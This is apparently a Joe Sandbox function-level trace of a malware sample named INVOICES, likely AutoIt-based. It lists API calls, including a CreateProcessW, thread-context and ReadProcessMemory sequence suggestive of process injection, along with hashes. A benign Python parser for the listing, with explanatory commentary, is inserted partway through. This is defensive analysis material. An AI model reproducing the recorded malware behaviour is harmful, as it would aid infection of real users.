  • Part of subcall function 007502E2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00750326
  • Part of subcall function 007502E2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00750331
  • Part of subcall function 007502E2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00750339
  • Part of subcall function 007502E2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00750341
  • Part of subcall function 00746259: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 007462B4
• GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0073FB2D
• OleInitialize.OLE32(00000000), ref: 0073FBAA
• CloseHandle.KERNEL32(00000000), ref: 00774921
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
• String ID: %|
• API String ID: 3094916012-1433500012
• Opcode ID: 311f6fd32c6879091744db81dfcc74430fa506b8e70b56a4e17ab5df6dafac3c
• Instruction ID: f5e6cf1a2bc9a93a1c3c4080395a4f22d7cc89764f2da70600751accf1b77aca
• Opcode Fuzzy Hash: 311f6fd32c6879091744db81dfcc74430fa506b8e70b56a4e17ab5df6dafac3c
• Instruction Fuzzy Hash: 3881ABB0915A84CFC384EF29E8486797BE5BB48316751C13ED619CB262EB7C4484CF69
APIs
• RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,007335A1,SwapMouseButtons,00000004,?), ref: 007335D4
• RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,007335A1,SwapMouseButtons,00000004,?,?,?,?,00732754), ref: 007335F5
• RegCloseKey.KERNELBASE(00000000,?,?,007335A1,SwapMouseButtons,00000004,?,?,?,?,00732754), ref: 00733617
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: Control Panel\Mouse
• API String ID: 3677997916-824357125
• Opcode ID: 05e6251a586c14b09c5f235020eafd7f466abfb63131be83b5b47f3a795d92d3
• Instruction ID: a3985f676528810f9861c7a59d4efa6509986989c0c33b9b7bb9745496ab2acf
• Opcode Fuzzy Hash: 05e6251a586c14b09c5f235020eafd7f466abfb63131be83b5b47f3a795d92d3
• Instruction Fuzzy Hash: 7C115771A10208FFEB209F64DC81EAEBBBCEF04740F008669F805D7221E2759F409BA4
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 00941A5B
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00941AF1
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00941B13
Memory Dump Source
• Source File: 00000000.00000002.1421076075.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_940000_INVOICES.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
• Opcode ID: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
• Instruction ID: d2f858cf29b3c833dafdfe61176e3bce7c72eb8136ede9e7680d4648724922aa
• Opcode Fuzzy Hash: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
• Instruction Fuzzy Hash: 89621B30A14258DBEB24CFA4C850BDEB376EF58300F1095A9E10DEB394E7799E81CB59
APIs
  • Part of subcall function 00735045: _fseek.LIBCMT ref: 0073505D
  • Part of subcall function 007997DD: _wcscmp.LIBCMT ref: 007998CD
  • Part of subcall function 007997DD: _wcscmp.LIBCMT ref: 007998E0
• _free.LIBCMT ref: 0079974B
• _free.LIBCMT ref: 00799752
• _free.LIBCMT ref: 007997BD
  • Part of subcall function 00752ED5: RtlFreeHeap.NTDLL(00000000,00000000,?,00759BA4), ref: 00752EE9
  • Part of subcall function 00752ED5: GetLastError.KERNEL32(00000000,?,00759BA4), ref: 00752EFB
• _free.LIBCMT ref: 007997C5
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
• String ID:
• API String ID: 1552873950-0
• Opcode ID: e7380544773663296b0c3136f1e3976d6f6c9a32d6817a33089202c8b0d22308
• Instruction ID: 497a63c2404e6a09bcbb8245be61924dbeb2b8a76a853e4fb021183bf04ed523
• Opcode Fuzzy Hash: e7380544773663296b0c3136f1e3976d6f6c9a32d6817a33089202c8b0d22308
• Instruction Fuzzy Hash: D7516FB1D04218EFEF249F64DC85A9EBBB9EF48310F14059EF609A7242DB755A80CF58
APIs
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: __flsbuf__flush__getptd_noexit__write_memmove
• String ID:
• API String ID: 2782032738-0
• Opcode ID: c192cc0e54a8f9db57de2592849b4d8a529bf1476805975b929b304db04efb62
• Instruction ID: 6a3f72830591fc9e47b004f2ceba156fdd9b03633e934825cae86716f915dcea
• Opcode Fuzzy Hash: c192cc0e54a8f9db57de2592849b4d8a529bf1476805975b929b304db04efb62
• Instruction Fuzzy Hash: F04108716047059BDB288F69C8869EF77A5AF4036AB14853DEC1587640DBF8FDC88B40
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: _memmove
• String ID: AU3!P/|$EA06
• API String ID: 4104443479-648605970
• Opcode ID: ad9b76ce40333da8f3f92cf0c2394333fb2a066f9ae5ad6fd14aa3dafc67253e
• Instruction ID: 72496805cd8ba12de3ff39fad7c7787389cfe1ef6f76390d91bbfc005d14c1f5
• Opcode Fuzzy Hash: ad9b76ce40333da8f3f92cf0c2394333fb2a066f9ae5ad6fd14aa3dafc67253e
• Instruction Fuzzy Hash: B6416D61A441589BFF299B64C8557BE7FA6EB05300F6C4075EC829B283C62DAD4487E1
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 0076ED92
                                                                                                                                  • 762ED0D0.COMDLG32(?), ref: 0076EDDC
                                                                                                                                    • Part of subcall function 007348AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007348A1,?,?,007337C0,?), ref: 007348CE
                                                                                                                                    • Part of subcall function 00750911: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00750930
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: NamePath$FullLong_memset
                                                                                                                                  • String ID: X
                                                                                                                                  • API String ID: 3051022977-3081909835
                                                                                                                                  • Opcode ID: 9882df3b8edd270406d31d984120c5448eecdf96933b5a75c212f512e469485e
                                                                                                                                  • Instruction ID: ac1bce869139c82e223e72cf1ee027c8d322da9f3c0d34303785e9733bf285b7
                                                                                                                                  • Opcode Fuzzy Hash: 9882df3b8edd270406d31d984120c5448eecdf96933b5a75c212f512e469485e
                                                                                                                                  • Instruction Fuzzy Hash: AD21A471A042889BDB559F94C849BEE7BF8AF48705F048019E909A7242DBFC5949CFA1
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0075588C: __FF_MSGBANNER.LIBCMT ref: 007558A3
                                                                                                                                    • Part of subcall function 0075588C: __NMSG_WRITE.LIBCMT ref: 007558AA
                                                                                                                                    • Part of subcall function 0075588C: RtlAllocateHeap.NTDLL(010B0000,00000000,00000001), ref: 007558CF
                                                                                                                                  • std::exception::exception.LIBCMT ref: 00750F6C
                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00750F81
                                                                                                                                    • Part of subcall function 0075871B: RaiseException.KERNEL32(?,?,00000000,007E9E78,?,00000001,?,?,?,00750F86,00000000,007E9E78,00739FEC,00000001), ref: 00758770
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                  • String ID: bad allocation
                                                                                                                                  • API String ID: 3902256705-2104205924
                                                                                                                                  • Opcode ID: 671bb035c2016ac8b6ef59823a3821ae22cfd82aadcd4572142511a596f73d7d
                                                                                                                                  • Instruction ID: e098a297a3b3835a06440538844adecc620a0acf106a00d5ba37444e2687c828
                                                                                                                                  • Opcode Fuzzy Hash: 671bb035c2016ac8b6ef59823a3821ae22cfd82aadcd4572142511a596f73d7d
                                                                                                                                  • Instruction Fuzzy Hash: D7F0C83150421DA7DB20BA94EC19EDE7BACDF10352F100469FD09A61D3EFF99A59C2D1
                                                                                                                                  APIs
                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 007999A1
                                                                                                                                  • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 007999B8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Temp$FileNamePath
                                                                                                                                  • String ID: aut
                                                                                                                                  • API String ID: 3285503233-3010740371
                                                                                                                                  • Opcode ID: f50c60c6aa8a8a612e8c57782b258d8bc74710a326cdbd59dfe4941489898573
                                                                                                                                  • Instruction ID: 4e7a648b4b2de8b954e38f5ce8d0a41c4b28eb3ad062fd29d6147d2aa7368a91
                                                                                                                                  • Opcode Fuzzy Hash: f50c60c6aa8a8a612e8c57782b258d8bc74710a326cdbd59dfe4941489898573
                                                                                                                                  • Instruction Fuzzy Hash: ACD05E7954030DABDB50ABA4DC0EFDA773CEB04B00F0043B1FF54D11A1EAB595988B95
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a53ce87126511b3e756c619e57390ef2871f83a7a8edc150bf44400c53c1fb46
                                                                                                                                  • Instruction ID: 3f159ab229b8ac690a3422fb0d89f2609a5069c279096a4019f14126e2d951a6
                                                                                                                                  • Opcode Fuzzy Hash: a53ce87126511b3e756c619e57390ef2871f83a7a8edc150bf44400c53c1fb46
                                                                                                                                  • Instruction Fuzzy Hash: 40F12871508304DFC714DF28C484A6ABBE5BFC9314F148A2EF89A9B251D779E945CF82
                                                                                                                                  APIs
                                                                                                                                  • __FF_MSGBANNER.LIBCMT ref: 007558A3
                                                                                                                                    • Part of subcall function 0075A2EB: __NMSG_WRITE.LIBCMT ref: 0075A312
                                                                                                                                    • Part of subcall function 0075A2EB: __NMSG_WRITE.LIBCMT ref: 0075A31C
                                                                                                                                  • __NMSG_WRITE.LIBCMT ref: 007558AA
                                                                                                                                    • Part of subcall function 0075A348: GetModuleFileNameW.KERNEL32(00000000,007F33BA,00000104,00000000,00000001,00000000), ref: 0075A3DA
                                                                                                                                    • Part of subcall function 0075A348: ___crtMessageBoxW.LIBCMT ref: 0075A488
                                                                                                                                    • Part of subcall function 0075321F: ___crtCorExitProcess.LIBCMT ref: 00753225
                                                                                                                                    • Part of subcall function 0075321F: ExitProcess.KERNEL32 ref: 0075322E
                                                                                                                                    • Part of subcall function 00758CA8: __getptd_noexit.LIBCMT ref: 00758CA8
                                                                                                                                  • RtlAllocateHeap.NTDLL(010B0000,00000000,00000001), ref: 007558CF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1372826849-0
                                                                                                                                  • Opcode ID: 72eca026657850499800f5350ce122827cc0e8f037444fd9ab14aeb39e97c3fc
                                                                                                                                  • Instruction ID: c4720f9726ed2b229b03d1439a2fa23d4113d442292849aca6e55a729f57e4ee
                                                                                                                                  • Opcode Fuzzy Hash: 72eca026657850499800f5350ce122827cc0e8f037444fd9ab14aeb39e97c3fc
                                                                                                                                  • Instruction Fuzzy Hash: 5D01D231240B01EBD61067749C2AAEE7358EF81763F100535FC01AE191DEFCAD088775
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,007995F1,?,?,?,?,?,00000004), ref: 00799964
                                                                                                                                  • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,007995F1,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0079997A
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,007995F1,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00799981
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseCreateHandleTime
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3397143404-0
                                                                                                                                  • Opcode ID: 86cbcc497fc3662fa005bc09da8b67915182bb4a6198412a9de12136dbbb21eb
                                                                                                                                  • Instruction ID: 92a72877dc28b9e0d52814c541dfb23e8d0a8e268a037b10acbe983e2b1f0cf4
                                                                                                                                  • Opcode Fuzzy Hash: 86cbcc497fc3662fa005bc09da8b67915182bb4a6198412a9de12136dbbb21eb
                                                                                                                                  • Instruction Fuzzy Hash: 3BE08632140218B7EB211B58EC09FDA7F58AB45B70F148324FB54790E087B52911979C
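The two records above (GetTempPathW / GetTempFileNameW with the prefix "aut", and CreateFileW / SetFileTime / CloseHandle) show each call site as a run of raw hex stack slots. The following is an added example, not code from Joe Sandbox or its IDA plugin: a small Python parser for the "APIs" lines of this listing that turns each line into a record, decodes CreateFileW's access, share, disposition and attribute values with the public Win32 constants, and pulls the prefix out of the GetTempFileNameW slot. The sample lines are copied from the two records above. One assumption is the author's, not the report's: only the first seven slots of a CreateFileW line are the API's parameters, and the slots after them are caller stack contents (the repeated 007995F1 looks like a return address).

```python
"""Parse the per-function "APIs" lines of a Joe Sandbox function listing.

Added example (not Joe Sandbox code). The line format and the sample lines
below are taken from the report; Win32 constant values are the public ones.
"""
import re
from dataclasses import dataclass
from typing import Optional

# "• Name.MODULE(slot,slot,...), ref: ADDR", optionally prefixed with
# "Part of subcall function ADDR:" when the call happens inside a callee.
API_LINE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[^\s.(]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

# Constructed sample: lines copied from two records of this listing.
SAMPLE = """\
• GetTempPathW.KERNEL32(00000104,?), ref: 007999A1
• GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 007999B8
• CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,007995F1,?,?,?,?,?,00000004), ref: 00799964
• SetFileTime.KERNELBASE(00000000,?,00000000,?,?,007995F1,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0079997A
• CloseHandle.KERNEL32(00000000,?,007995F1,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00799981
• _free.LIBCMT ref: 00798DC4
  • Part of subcall function 00752ED5: RtlFreeHeap.NTDLL(00000000,00000000,?,00759BA4), ref: 00752EE9
"""

@dataclass
class ApiCall:
    api: str
    module: str
    args: list                      # raw stack slots; "?" = value not recovered
    ref: int                        # call-site address inside the dump
    subcall: Optional[str] = None   # callee address for "Part of subcall function" lines

def parse_api_lines(text: str) -> list:
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16), m.group("sub")))
    return calls

def _hex(tok: str) -> Optional[int]:
    return None if tok == "?" else int(tok, 16)

GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
           0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}

def _flags(value: Optional[int], table: dict) -> list:
    if value is None:
        return ["?"]
    return [name for bit, name in table.items() if value & bit]

def decode_create_file(call: ApiCall) -> dict:
    """Decode CreateFileW's dwDesiredAccess, dwShareMode, dwCreationDisposition
    and dwFlagsAndAttributes. Assumption: only the first seven slots are the
    API's parameters; the listing also shows caller stack beyond them."""
    if call.api != "CreateFileW" or len(call.args) < 7:
        raise ValueError("not a complete CreateFileW call site")
    access, share, _sec_attrs, disp, attrs = (_hex(t) for t in call.args[1:6])
    if attrs is None:
        attrs_name = "?"
    elif attrs == 0x80:
        attrs_name = "FILE_ATTRIBUTE_NORMAL"
    else:
        attrs_name = f"0x{attrs:x}"
    return {"access": _flags(access, GENERIC), "share": _flags(share, SHARE),
            "disposition": DISPOSITION.get(disp, "?"), "attributes": attrs_name}

def temp_file_prefix(call: ApiCall) -> Optional[str]:
    """GetTempFileNameW(lpPathName, lpPrefixString, uUnique, lpTempFileName):
    the second slot is the prefix of the generated file name."""
    if call.api != "GetTempFileNameW" or len(call.args) < 2 or call.args[1] == "?":
        return None
    return call.args[1]

def summarize(calls: list) -> dict:
    """Roll one function's call list up into the fields a triage note needs."""
    out = {"direct": sorted({c.api for c in calls if c.subcall is None}),
           "via_subcalls": sorted({c.api for c in calls if c.subcall is not None}),
           "temp_prefix": None, "create_file": None}
    for c in calls:
        if c.api == "GetTempFileNameW":
            out["temp_prefix"] = temp_file_prefix(c)
        elif c.api == "CreateFileW":
            out["create_file"] = decode_create_file(c)
    return out

if __name__ == "__main__":
    for key, value in summarize(parse_api_lines(SAMPLE)).items():
        print(f"{key}: {value}")
```

Run over the sample, the CreateFileW site decodes to GENERIC_WRITE, FILE_SHARE_READ, OPEN_EXISTING and FILE_ATTRIBUTE_NORMAL, which together with the SetFileTime call that follows it in the same function is the shape of a routine that opens an existing file for writing and rewrites its timestamps. The first GetTempPathW slot, 0x104, is MAX_PATH (260), and the 0x7FFF passed to GetFullPathNameW / GetLongPathNameW in the earlier record is the extended-path limit, so those buffer sizes are the AutoIt runtime's own path handling rather than anything unusual.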
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 00798DC4
                                                                                                                                    • Part of subcall function 00752ED5: RtlFreeHeap.NTDLL(00000000,00000000,?,00759BA4), ref: 00752EE9
                                                                                                                                    • Part of subcall function 00752ED5: GetLastError.KERNEL32(00000000,?,00759BA4), ref: 00752EFB
                                                                                                                                  • _free.LIBCMT ref: 00798DD5
                                                                                                                                  • _free.LIBCMT ref: 00798DE7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 3221efda5ec1aeb3564d3aaca8a62a8878e7642d45a62f0f0d26450024f2f6e1
                                                                                                                                  • Instruction ID: d43a07c443184d7126750cbfe10e8a77df146777e253876652b3b45114bd4b5b
                                                                                                                                  • Opcode Fuzzy Hash: 3221efda5ec1aeb3564d3aaca8a62a8878e7642d45a62f0f0d26450024f2f6e1
                                                                                                                                  • Instruction Fuzzy Hash: AFE012A170160183DEA465787949ED313DC5F5E362B18081EB809D7583CE6CE8878164
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: CALL
                                                                                                                                  • API String ID: 0-4196123274
                                                                                                                                  • Opcode ID: f5bdc1644546a002253d81942338be0ce06adf58b014f502abf746963edd2aea
                                                                                                                                  • Instruction ID: 8ff5357fcee77575ec843f897f73fbf05e2efc70888f724454337d112f003345
                                                                                                                                  • Opcode Fuzzy Hash: f5bdc1644546a002253d81942338be0ce06adf58b014f502abf746963edd2aea
                                                                                                                                  • Instruction Fuzzy Hash: 15224A70608301DFEB28DF14C495B6AB7E1BF84304F14896DE99A8B362D779ED45CB82
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4104443479-0
                                                                                                                                  • Opcode ID: 110dd0e2576012a0094b73eb3352dcde9e624fd67b43ab06109a497bb09d0b37
                                                                                                                                  • Instruction ID: 6f16e9c55e53fbb6d22dca3f007ff310d23daac342ae8a3a5c139e6573da8a29
                                                                                                                                  • Opcode Fuzzy Hash: 110dd0e2576012a0094b73eb3352dcde9e624fd67b43ab06109a497bb09d0b37
                                                                                                                                  • Instruction Fuzzy Hash: 9D31B8F1604506EFD728DF28D8D1D69F3A9FF48310B158629E915CB292DB74E850CBA0
                                                                                                                                  APIs
                                                                                                                                  • 74B1C8D0.UXTHEME ref: 00734992
                                                                                                                                    • Part of subcall function 007534EC: __lock.LIBCMT ref: 007534F2
                                                                                                                                    • Part of subcall function 007534EC: RtlDecodePointer.NTDLL(00000001), ref: 007534FE
                                                                                                                                    • Part of subcall function 007534EC: RtlEncodePointer.NTDLL(?), ref: 00753509
                                                                                                                                    • Part of subcall function 00734A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00734A73
                                                                                                                                    • Part of subcall function 00734A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00734A88
                                                                                                                                    • Part of subcall function 00733B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00733B7A
